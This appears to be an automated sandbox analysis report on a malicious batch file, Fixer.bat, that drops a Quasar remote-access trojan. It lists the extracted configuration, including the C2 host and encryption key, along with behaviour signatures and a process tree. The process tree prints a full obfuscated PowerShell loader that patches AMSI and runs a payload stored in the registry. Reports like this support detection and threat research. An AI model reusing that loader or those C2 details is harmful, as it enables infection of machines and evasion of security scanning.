Analysis
-
max time kernel
28s -
max time network
17s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
12-05-2024 18:29
Static task
static1
Behavioral task
behavioral1
Sample
Fixer.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Fixer.bat
Resource
win10v2004-20240426-en
General
-
Target
Fixer.bat
-
Size
621B
-
MD5
e235e723f57a72ef725306c3e14d4726
-
SHA1
9b2153053f8e89c300e32da5df32e9b990594aac
-
SHA256
aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67
-
SHA512
0a4eda531be3904ae944d2c1c43755921cde4333a8e9d6bee6669e3de73b6c7859bb7ab3aa7a712fa2085d3fa1fb1d1ed14e5d6ed488a10bd2f6ab6ed049d25e
Malware Config
Extracted
quasar
3.1.5
RPad
even-lemon.gl.at.ply.gg:33587
$Sxr-okPqrmZ8kNVUcS4Rp0
-
encryption_key
XmcBnPuLlN1e8SHIRR1z
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\BoostBot.exe family_quasar behavioral1/memory/1752-53-0x0000000000950000-0x00000000009BC000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 312 created 588 312 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 3 IoCs
Processes:
BoostBot.exe$sxr-powershell.exeinstall.exepid process 1752 BoostBot.exe 1072 $sxr-powershell.exe 1344 install.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
powershell.EXEdescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 312 set thread context of 1776 312 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 2928 schtasks.exe 3820 SCHTASKS.exe 1164 schtasks.exe -
Modifies data under HKEY_USERS 42 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.EXEdllhost.exe$sxr-powershell.exewmiprvse.exepid process 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 312 powershell.EXE 312 powershell.EXE 312 powershell.EXE 312 powershell.EXE 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1072 $sxr-powershell.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 5104 wmiprvse.exe 1776 dllhost.exe 1776 dllhost.exe 1072 $sxr-powershell.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1072 $sxr-powershell.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1072 $sxr-powershell.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe 1776 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeBoostBot.exe$sxr-powershell.exepowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 3452 powershell.exe Token: SeDebugPrivilege 1752 BoostBot.exe Token: SeDebugPrivilege 1072 $sxr-powershell.exe Token: SeDebugPrivilege 312 powershell.EXE Token: SeDebugPrivilege 312 powershell.EXE Token: SeDebugPrivilege 1776 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2464 svchost.exe Token: SeIncreaseQuotaPrivilege 2464 svchost.exe Token: SeSecurityPrivilege 2464 svchost.exe Token: SeTakeOwnershipPrivilege 2464 svchost.exe Token: SeLoadDriverPrivilege 2464 svchost.exe Token: SeSystemtimePrivilege 2464 svchost.exe Token: SeBackupPrivilege 2464 svchost.exe Token: SeRestorePrivilege 2464 svchost.exe Token: SeShutdownPrivilege 2464 svchost.exe Token: SeSystemEnvironmentPrivilege 2464 svchost.exe Token: SeUndockPrivilege 2464 svchost.exe Token: SeManageVolumePrivilege 2464 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2464 svchost.exe Token: SeIncreaseQuotaPrivilege 2464 svchost.exe Token: SeSecurityPrivilege 2464 svchost.exe Token: SeTakeOwnershipPrivilege 2464 svchost.exe Token: SeLoadDriverPrivilege 2464 svchost.exe Token: SeSystemtimePrivilege 2464 svchost.exe Token: SeBackupPrivilege 2464 svchost.exe Token: SeRestorePrivilege 2464 svchost.exe Token: SeShutdownPrivilege 2464 svchost.exe Token: SeSystemEnvironmentPrivilege 2464 svchost.exe Token: SeUndockPrivilege 2464 svchost.exe Token: SeManageVolumePrivilege 2464 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2464 svchost.exe Token: SeIncreaseQuotaPrivilege 2464 svchost.exe Token: SeSecurityPrivilege 2464 svchost.exe Token: SeTakeOwnershipPrivilege 2464 svchost.exe Token: SeLoadDriverPrivilege 2464 svchost.exe Token: SeSystemtimePrivilege 2464 svchost.exe Token: SeBackupPrivilege 2464 svchost.exe Token: SeRestorePrivilege 2464 svchost.exe Token: SeShutdownPrivilege 2464 svchost.exe Token: SeSystemEnvironmentPrivilege 2464 svchost.exe Token: SeUndockPrivilege 2464 svchost.exe Token: SeManageVolumePrivilege 2464 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2464 svchost.exe Token: SeIncreaseQuotaPrivilege 2464 svchost.exe Token: SeSecurityPrivilege 2464 svchost.exe Token: SeTakeOwnershipPrivilege 2464 svchost.exe Token: SeLoadDriverPrivilege 2464 svchost.exe Token: SeSystemtimePrivilege 2464 svchost.exe Token: SeBackupPrivilege 2464 svchost.exe Token: SeRestorePrivilege 2464 svchost.exe Token: SeShutdownPrivilege 2464 svchost.exe Token: SeSystemEnvironmentPrivilege 2464 svchost.exe Token: SeUndockPrivilege 2464 svchost.exe Token: SeManageVolumePrivilege 2464 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2464 svchost.exe Token: SeIncreaseQuotaPrivilege 2464 svchost.exe Token: SeSecurityPrivilege 2464 svchost.exe Token: SeTakeOwnershipPrivilege 2464 svchost.exe Token: SeLoadDriverPrivilege 2464 svchost.exe Token: SeSystemtimePrivilege 2464 svchost.exe Token: SeBackupPrivilege 2464 svchost.exe Token: SeRestorePrivilege 2464 svchost.exe Token: SeShutdownPrivilege 2464 svchost.exe Token: SeSystemEnvironmentPrivilege 2464 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 1072 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeBoostBot.exe$sxr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 3928 wrote to memory of 3848 3928 cmd.exe certutil.exe PID 3928 wrote to memory of 3848 3928 cmd.exe certutil.exe PID 3928 wrote to memory of 3452 3928 cmd.exe powershell.exe PID 3928 wrote to memory of 3452 3928 cmd.exe powershell.exe PID 3452 wrote to memory of 1752 3452 powershell.exe BoostBot.exe PID 3452 wrote to memory of 1752 3452 powershell.exe BoostBot.exe PID 3452 wrote to memory of 1752 3452 powershell.exe BoostBot.exe PID 3928 wrote to memory of 2804 3928 cmd.exe icacls.exe PID 3928 wrote to memory of 2804 3928 cmd.exe icacls.exe PID 3928 wrote to memory of 4188 3928 cmd.exe reg.exe PID 3928 wrote to memory of 4188 3928 cmd.exe reg.exe PID 3928 wrote to memory of 2392 3928 cmd.exe attrib.exe PID 3928 wrote to memory of 2392 3928 cmd.exe attrib.exe PID 1752 wrote to memory of 1164 1752 BoostBot.exe schtasks.exe PID 1752 wrote to memory of 1164 1752 BoostBot.exe schtasks.exe PID 1752 wrote to memory of 1164 1752 BoostBot.exe schtasks.exe PID 1752 wrote to memory of 1072 1752 BoostBot.exe $sxr-powershell.exe PID 1752 wrote to memory of 1072 1752 BoostBot.exe $sxr-powershell.exe PID 1752 wrote to memory of 1072 1752 BoostBot.exe $sxr-powershell.exe PID 1072 wrote to memory of 2928 1072 $sxr-powershell.exe schtasks.exe PID 1072 wrote to memory of 2928 1072 $sxr-powershell.exe schtasks.exe PID 1072 wrote to memory of 2928 1072 $sxr-powershell.exe schtasks.exe PID 1752 wrote to memory of 1344 1752 BoostBot.exe install.exe PID 1752 wrote to memory of 1344 1752 BoostBot.exe install.exe PID 1752 wrote to memory of 1344 1752 BoostBot.exe install.exe PID 1752 wrote to memory of 3820 1752 BoostBot.exe SCHTASKS.exe PID 1752 wrote to memory of 3820 1752 BoostBot.exe SCHTASKS.exe PID 1752 wrote to memory of 3820 1752 BoostBot.exe SCHTASKS.exe PID 312 wrote to memory of 1776 312 powershell.EXE dllhost.exe PID 312 wrote to memory of 1776 312 powershell.EXE dllhost.exe PID 312 wrote to memory of 1776 312 powershell.EXE dllhost.exe PID 312 wrote to memory of 1776 312 powershell.EXE dllhost.exe PID 312 wrote to memory of 1776 312 powershell.EXE dllhost.exe PID 312 wrote to memory of 1776 312 powershell.EXE dllhost.exe PID 312 wrote to memory of 1776 312 powershell.EXE dllhost.exe PID 312 wrote to memory of 1776 312 powershell.EXE dllhost.exe PID 1776 wrote to memory of 588 1776 dllhost.exe winlogon.exe PID 1776 wrote to memory of 640 1776 dllhost.exe lsass.exe PID 1776 wrote to memory of 748 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 912 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1020 1776 dllhost.exe dwm.exe PID 1776 wrote to memory of 368 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 716 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 832 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1092 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1156 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1196 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1252 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1260 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1272 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1368 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1460 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1472 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1516 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1548 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1580 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1668 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1700 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1832 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1856 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1920 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1960 1776 dllhost.exe svchost.exe PID 1776 wrote to memory of 1304 1776 dllhost.exe spoolsv.exe PID 1776 wrote to memory of 1916 1776 dllhost.exe svchost.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:588
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1020
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d92be1fb-eaac-4de5-aa44-b1ff42b81248}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:640
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:748
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:912
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:368
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:716
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:832
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1092
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1156
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:BBeJPyqCvTor{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KDrzTvTurstMrw,[Parameter(Position=1)][Type]$ztLYPkXpbU)$Mboquqfbrik=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+[Char](108)+''+'e'+'c'+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMem'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'ule',$False).DefineType('My'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+'P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+''+[Char](101)+'d'+','+''+'A'+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$Mboquqfbrik.DefineConstructor('R'+[Char](84)+''+'S'+'p'+[Char](101)+'c'+[Char](105)+''+[Char](97)+'l'+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KDrzTvTurstMrw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');$Mboquqfbrik.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+'By'+'S'+'i'+[Char](103)+''+[Char](44)+''+'N'+''+'e'+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+'al',$ztLYPkXpbU,$KDrzTvTurstMrw).SetImplementationFlags(''+'R'+''+'u'+'n'+'t'+''+'i'+'me,'+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $Mboquqfbrik.CreateType();}$TgZWwidRJVNOW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+'f'+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+'feN'+'a'+''+[Char](116)+''+[Char](105)+'ve'+'M'+'e'+'t'+''+[Char](104)+''+'o'+''+'d'+''+[Char](115)+'');$BOJdhoWaZsNKXC=$TgZWwidRJVNOW.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+'o'+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags]('Pu'+'b'+''+'l'+''+[Char](105)+''+[Char](99)+',S'+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$cbznyxAqhcDoGFPYukP=BBeJPyqCvTor @([String])([IntPtr]);$DuEytqMJBrpyOZOYccIkjx=BBeJPyqCvTor @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CuLPYZxEero=$TgZWwidRJVNOW.GetMethod(''+[Char](71)+'etMo'+[Char](100)+'ule'+[Char](72)+''+'a'+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$BaFnNpVmzTRJAN=$BOJdhoWaZsNKXC.Invoke($Null,@([Object]$CuLPYZxEero,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+'ra'+[Char](114)+''+'y'+''+[Char](65)+'')));$RWaAeWHHialeEyqIw=$BOJdhoWaZsNKXC.Invoke($Null,@([Object]$CuLPYZxEero,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+'t'+''+'e'+'ct')));$XHjHZho=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BaFnNpVmzTRJAN,$cbznyxAqhcDoGFPYukP).Invoke('a'+[Char](109)+''+[Char](115)+''+'i'+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$GDpYbKzXUvPuTXYQR=$BOJdhoWaZsNKXC.Invoke($Null,@([Object]$XHjHZho,[Object](''+'A'+''+[Char](109)+'si'+'S'+''+[Char](99)+'a'+'n'+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$OtiynqEomc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RWaAeWHHialeEyqIw,$DuEytqMJBrpyOZOYccIkjx).Invoke($GDpYbKzXUvPuTXYQR,[uint32]8,4,[ref]$OtiynqEomc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GDpYbKzXUvPuTXYQR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RWaAeWHHialeEyqIw,$DuEytqMJBrpyOZOYccIkjx).Invoke($GDpYbKzXUvPuTXYQR,[uint32]8,0x20,[ref]$OtiynqEomc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+'E'+'').GetValue(''+'$'+''+[Char](55)+''+'7'+'s'+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:312
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1196
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1252
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1260
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1272
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1368
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1460
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1472
-
c:\windows\system32\sihost.exesihost.exe2⤵PID:2936
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1516
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1548
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1580
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1856
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1920
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1960
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1304
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:1916
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2264
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2276
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2284
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2292
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2412
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2432
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2444
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2472
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2652
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2908
